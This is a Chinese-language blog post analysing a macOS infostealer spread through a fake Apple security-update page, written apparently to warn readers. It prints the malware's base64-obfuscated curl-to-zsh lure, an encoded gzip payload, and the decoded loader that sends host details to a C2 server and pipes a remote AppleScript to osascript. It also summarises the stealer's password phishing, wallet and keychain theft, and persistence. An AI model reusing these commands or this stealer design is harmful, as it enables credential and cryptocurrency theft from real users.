HomeCategoryTag
Post
0
Category
0
Tag
0

一个恶意软件

2026-06-07
DEV

2026-06-10:该网站已经无法访问,访问会出现一个希腊文网页

一下在Windows sandbox中执行,请勿随意尝试

url:https://krinilive[.]gr/ons/

长得很像苹果网站,不过上面的header都点不动

204b7c89-f9a8-4de5-8b08-0b7d5ddf04e6.png

脚本:

# echo "Downloading Update: https://support.apple.com/downloads/macos-sonoma-14.4.1-security.dmg" && curl -s $(echo "aHR0cHM6Ly9sdWJsdXBvbmNoaWtpLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9ZTc0Mzk5MDUwNjE0OGNiYmNjMjY3NTA0OGU1YjZmNzg=" | base64 -d) | zsh

base64解出来curl的url是https://lubluponchiki[.]com/debug/loader[.]sh?build=e743990506148cbbcc2675048e5b6f78;并请注意,https://support.apple.com/downloads/macos-sonoma-14.4.1-security.dmg这个文件似乎并不存在

可以看到杀毒软件和浏览器都报警了

image.png

image.png

无视风险继续访问,下载的脚本如下,是二进制压缩后的字节串base64,文本工具显示不了

#!/bin/zsh
d81d47f=$(base64 -D <<'PAYLOAD_46ed0a9f' | gunzip
H4sIACWZGGoC/71U4VLjNhD+75m+w1ZHLzBD7CQkBLjCldK0pATCNCllpu14ZHsdq1EknyQD4bhOH6JP2CepZBMISYdO/9S/tGt9q939vt03nwcRE8G9zrw38A1GxQS4pAkq+OuPPyFBg7GBk/4IqEgg4jKewi0zGRjkOEOj5l5/FNr/hySlXCPxWGpRKS240aCQJvB7MGCRomoeXCpMUaGIUQexnPk0zzn6p/2xlDySd37OmTZw7Lw9QSOOSV/khRnJQlkItI6CBG8CUXAODzBRmEP9AwNVaM2oeAcmQ+GB/RYZGVXYhFLmlaWVldgCKEdgIpVlgZoKZtg9QioVfD8aXniD4cnxoBf2L74dHm5s/o+lMCBnOI8kVcmAzmVh4ILOkNj/mXu73rEno6D2i6hBbbtWWfUEauT5TGr2/gNgnEkghZgKeSvIlnc6HI0vjs97tqBMaiNs3JUUlkKtw4ej8Kr3gwXr2/AGlYZ6rmRSxObKGkyKl7HW8b3rcdi/tPi4UBzqFl+f0bu6YTaNDmTG5PogCGjOfJazdO5LNVkN+SqSxVRk9J7lvqXivyHTWIqUTfzVhrxSRPVjo7LJc++8z6C25aT2dcF4UorJyitFPodCMzGBXDFhUk+jSMLETVqINyjM5hZ8LGVbahN6V+NDstEkSy4Xyj5c4aH2kZQ4ckC+0GSbRO65MKM6W3hY/nTSYcz0wqrEv7AWSljYUpfkWj4rz6eaq/JqTIBgt72zv9/oNHab7b04iuK4tdvtNNp72Il20+4eWeoH2ajGz52WZsmZCxm6c6Up21dX5hNH13Bp7wBZ8MOLiBe5FHHGpsyx61QSlM0LqiZA/RTIiRTGGvXxPMcDcLNoJWFsJcFv2pZTTsaG6yJ5KYMlxltHb5veJ0dfPy33XbkdLFVgGxiWiw8TKN8sVyHeMeN23c9LBR9CtXLg16VltEo3kKWAZC0FB3GxofG4uC6keZlPtZ5DhR8K1GaRlLf+zurFtcfgreclFGdShGkhYtewJzHiHcbw5dP9Z9/RP/haK86Kz+nK2O00SrJ+1KjqxxOb4gGcy3vGOQ06fgM2z2lsBS519g76lk8O1gHDEVxDsxE2O2F3q1qoP2F0xkzQ2en6O7uweXY6Ph9sA2dThO8wnsotOMmUnGGw3/QbfrvdbfnNZhtGNKWKPcLIaxqr9JXTuetgtdp1rFhu3pezdvjv4/AAUtMKY0W10mOrmK+I7f0jzX8DLlf6qoIHAAA=
PAYLOAD_46ed0a9f
)
# eval "$d81d47f"

把eval换成echo打印如下,这个就是恶意软件真正的加载器了,从https://lubluponchiki[.]com/debug/payload[.]applescript?build=e743990506148cbbcc2675048e5b6f78下载真正的脚本在用户机器上执行,值得注意的是,主加载器带有地址围栏,脚本检测用户启用俄语输入法,或IP属于CIS(Commonwealth of independent states)地区时则只发送debug信号,不真正执行攻击。

#!/bin/zsh
# Debug loader — detect CIS and block with telemetry
IS_CIS="false"
if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian; then
    IS_CIS="true"
fi

# Detect locale info — sanitize for JSON
LOCALE_INFO=$(defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -i "KeyboardLayout Name" | head -5 | tr '\n' ',' | tr -d '"' | tr -d "'" || echo "unknown")
HOSTNAME=$(hostname 2>/dev/null | tr -d '"' || echo "unknown")
OS_VER=$(sw_vers -productVersion 2>/dev/null || echo "unknown")
EXT_IP=$(curl -s --max-time 5 https://api.ipify.org 2>/dev/null || curl -s --max-time 5 https://icanhazip.com 2>/dev/null || curl -s --max-time 5 https://ifconfig.me 2>/dev/null || echo "unknown")
EXT_IP=$(echo "$EXT_IP" | tr -d '
 ')

# Build JSON safely using printf
send_debug_event() {
    local EVT="$1"
    local JSON=$(printf '{"event":"%s","build_hash":"%s","ip":"%s","is_cis":"%s","locale":"%s","hostname":"%s","os_version":"%s"}' "$EVT" "e743990506148cbbcc2675048e5b6f78" "$EXT_IP" "$IS_CIS" "$LOCALE_INFO" "$HOSTNAME" "$OS_VER")
    curl -s -X POST "https://lubluponchiki[.]com/api/debug/event" -H "Content-Type: application/json" -d "$JSON" --max-time 5 >/dev/null 2>&1
}

# If CIS — send cis_blocked event and exit
if [ "$IS_CIS" = "true" ]; then
    send_debug_event "cis_blocked" >/dev/null 2>&1
    exit 0
fi

# Not CIS — send loader_requested event
send_debug_event "loader_requested" >/dev/null 2>&1 &

daemon_function() {
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" "https://lubluponchiki[.]com/debug/payload[.]applescript?build=e743990506148cbbcc2675048e5b6f78" | osascript
}
# daemon_function "$@" &
exit 0

脚本原文就不放上来了,给一个AI生成的摘要:

 

这个脚本是一个 AppleScript 脚本,其主要功能是 在 macOS 系统上进行信息收集、数据窃取,并尝试实现持久化驻留。它具有典型的恶意软件特征,目标是窃取用户的敏感信息(尤其是加密货币钱包、浏览器数据、系统凭证等),并将数据打包上传到远程服务器。

以下是对脚本的详细解释:

1. 核心目的

  • 信息窃取 (InfoStealer):从受感染的 macOS 设备上收集各种敏感数据。
  • 远程控制与报告:将收集到的数据上传到攻击者控制的服务器 (lubluponchiki[.]com),并根据执行情况发送状态报告。
  • 持久化 (Persistence):尝试在系统中安装一个守护进程或代理,以便在设备重启后仍能运行。
  • 应用注入 (Injection):针对特定的加密货币钱包应用(如 Exodus, Atomic Wallet)进行文件替换,以植入恶意代码。

2. 主要功能模块详解

A. 基础工具函数

脚本开头定义了一系列辅助函数,用于执行文件和目录操作:

  • filesizer(): 获取文件大小。
  • mkdir(): 创建目录。
  • FileName() / BeforeFileName(): 解析文件路径。
  • writeText(): 将文本写入文件(会自动创建父目录)。
  • debugLog(): 将带时间戳的消息写入一个名为 debug 的日志文件,用于追踪脚本执行过程。
  • readwrite(): 复制文件,并记录成功或失败的日志。
  • isDirectory(): 判断一个路径是否为目录。

B. 用户凭证获取 (getpwd)

这是脚本的关键部分,旨在获取用户的登录密码:

  1. 验证机制: 使用 dscl . authonly 命令来验证用户名和密码是否有效。
  2. 直接尝试: 如果提供了密码,则直接验证。
  3. 无密码检查: 检查用户是否设置了空密码(不安全配置)。
  4. 弹窗钓鱼: 如果以上都不行,脚本会最多弹出10次对话框,伪装成“系统偏好设置”更新提示,诱骗用户输入密码。每次输入都会被验证,有效的密码会被保存,无效的会被记录。

C. 浏览器数据窃取

脚本会扫描并窃取多种基于 Chromium 和 Gecko 内核的浏览器数据。

  • Chromium() 函数:
    • 目标浏览器: Chrome, Brave, Edge, Opera, Vivaldi, Arc 等。
    • 窃取内容: Cookies, Login Data (保存的密码), Web Data (自动填充), History 等关键数据库文件。
  • Gecko() 函数:
    • 目标浏览器: Firefox。
    • 窃取内容: cookies.sqlite, logins.json (主密码加密的登录信息), key4.db (解密 logins.json 所需的密钥) 等。
  • ChromiumWallets() 函数:
    • 这是一个非常有针对性的功能。它维护了一个庞大的加密货币钱包扩展ID列表(超过100个)。
    • 脚本会扫描浏览器的扩展目录,一旦发现匹配的钱包扩展(如 MetaMask, Phantom, Trust Wallet 等),就会窃取其整个本地存储数据 (Local Extension Settings),这些数据通常包含用户的私钥或助记词。

D. 桌面钱包数据窃取 (DesktopWallets)

脚本会直接定位并复制流行桌面加密货币钱包的存储目录,例如:

  • Exodus
  • Electrum (BTC)
  • Atomic Wallet
  • Guarda
  • Coinomi
  • Sparrow
  • Wasabi
  • Bitcoin Core, Litecoin Core, Dash Core 等官方钱包
  • Ledger Live, Trezor Suite 等硬件钱包配套软件

E. 其他敏感信息窃取

  • Telegram: 窃取 Telegram Desktop 的 tdata 目录中的会话密钥文件,可能用于会话劫持。
  • Keychains: 复制整个 ~/Library/Keychains/ 目录,其中包含用户的钥匙串,可能存有各种服务的密码。
  • iCloud: 尝试窃取 iCloud 账户相关的配置文件。
  • 通用文件抓取 (Filegrabber): 扫描用户的 DesktopDocuments 文件夹,寻找 .docx, .txt, .csv, .json 等文档文件以及 .png 图片,但有大小(2MB/6MB)和总容量(150MB)限制。
  • Shell 配置与历史: 窃取 .zshrc, .zsh_history, .bash_history 等文件,可能包含命令历史、环境变量或API密钥。
  • Discord & Steam: 窃取 Discord 的 leveldb(可能包含令牌)和 Steam 的 loginusers.vdfconfig.vdfssfn* 文件(可用于会话维持)。

F. 数据打包与上传

  1. 创建临时目录: 所有窃取的数据都先存放在 /tmp/shub_<随机数>/ 目录下。
  2. 生成ZIP: 使用 ditto 命令将临时目录打包成 shub_log.zip
  3. 智能上传:
    • 如果数据包小于85MB,则一次性上传。
    • 如果数据包很大,则会分块压缩(每个块约70MB),然后逐个上传到 /gate/chunk 端点。
  4. C2通信: 所有上传和状态报告都发往 https://lubluponchiki[.]com。脚本会发送设备信息(IP、主机名、OS版本、是否为CIS地区)、窃取成果摘要、上传状态等。

G. 应用注入 (WALLET INJECTION)

这是一个高级且危险的功能。如果检测到目标钱包应用(如 Exodus, Atomic Wallet, Ledger Live, Trezor Suite)已安装,脚本会:

  1. 从 C2 服务器下载一个恶意的 app.asar 文件(Electron 应用的核心代码包)。
  2. 强制关闭目标应用。
  3. 替换掉应用原有的 app.asar 文件。
  4. 重新签名应用以绕过 Gatekeeper。
    这样,当用户下次启动该钱包时,实际上运行的是攻击者的恶意代码,可以实时监控和窃取用户的交易、私钥等。

H. 持久化 (PERSISTENCE)

脚本会尝试两种方式实现开机自启:

  1. Root级守护进程 (LaunchDaemon): 如果成功获取了用户密码,会利用管理员权限在 /Library/LaunchDaemons/ 下创建一个 plist 文件,以 root 权限运行一个后台服务。
  2. 用户级代理 (LaunchAgent): 如果没有获取到密码,则退而求其次,在当前用户的 ~/Library/LaunchAgents/ 目录下创建一个 plist 文件,实现用户登录后的自启。

I. 最终伪装

脚本执行完毕后,会弹出一个对话框,伪装成系统错误:“Your Mac does not support this application...”,以迷惑用户。

3. 总结与风险评估

这是一个高度复杂、功能齐全的 macOS 间谍软件/信息窃取木马。它的主要威胁包括:

  • 全面的数据泄露: 几乎覆盖了所有主流的敏感数据存储位置。
  • 针对性强: 对加密货币用户有极强的针对性,不仅窃取钱包文件,还直接攻击钱包应用本身。
  • 隐蔽性强: 使用合法的系统工具(curl, ditto, launchctl)进行操作,并通过分块上传规避简单的流量监控。
  • 危害极大: 一旦成功注入钱包应用,可能导致用户资产被实时盗刷。

如果你在自己的系统上发现了此脚本,请立即:

  1. 断开网络连接。
  2. 使用专业的 macOS 安全软件进行全面扫描。
  3. 重置所有重要账户的密码,特别是与加密货币、邮箱、社交网络相关的账户。
  4. 如果你使用了被注入的钱包应用,请立即将资产转移到新的、干净的钱包地址
  5. 考虑重装系统以确保彻底清除。

 

 

wwr.icu 2026